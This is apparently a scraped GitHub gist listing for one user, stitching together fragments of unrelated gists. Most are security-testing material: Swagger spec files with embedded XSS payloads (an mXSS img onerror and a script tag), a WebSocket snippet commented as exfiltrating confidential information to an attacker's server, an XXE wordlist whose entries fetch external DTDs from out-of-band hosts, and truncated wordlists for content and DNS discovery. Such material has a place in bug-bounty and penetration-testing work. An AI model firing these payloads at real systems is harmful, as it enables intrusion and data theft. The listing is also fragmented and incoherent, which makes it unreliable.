Skip to content

Instantly share code, notes, and snippets.

swagger: '2.0'
title: Example yaml.spec
description: |
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
swagger: "2.0"
description: "This is a sample server Petstore server. You can find out more about Swagger at []( or on [, #swagger]( For this sample, you can use the api key `special-key` to test the authorization filters."
version: "1.0.0"
title: "Swagger Petstore"
termsOfService: ""
email: ""
name: "Apache 2.0"
istefy / xss
Last active February 24, 2022 18:39
# Create display override file to force Mac OS X to use RGB mode for Display
# see
require 'base64'
data=`ioreg -l -d0 -w 0 -r -c AppleDisplay`
var ws = new WebSocket("wss://");
ws.onopen = start
ws.onmessage = handleReply
function start(event) {
ws.send("READY"); //Send the message to retreive confidential information
function handleReply(event) {
//Exfiltrate the confidential information to attackers server
swagger : "2.0",
info : {
description : "<a href= data-type=script style='cursor:default' data-remote=true class='atwho-view select2-drop-mask pika-select'></a><script>alert(0)</script>",
title : "Hello"
version: "1.1.1"
istefy / xxe-payloads.txt
Created September 20, 2020 17:56 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
### Keybase proof
I hereby claim:
* I am istefy on github.
* I am istef ( on keybase.
* I have a public key ASA0XzRqHCN0laSZyTAdhn3YkFX5opmZ14q7FIGRv9_PIAo
To claim this, I am signing this object:
istefy / content_discovery_all.txt
Created October 25, 2018 08:58 — forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
istefy / all.txt
Created October 25, 2018 08:58 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.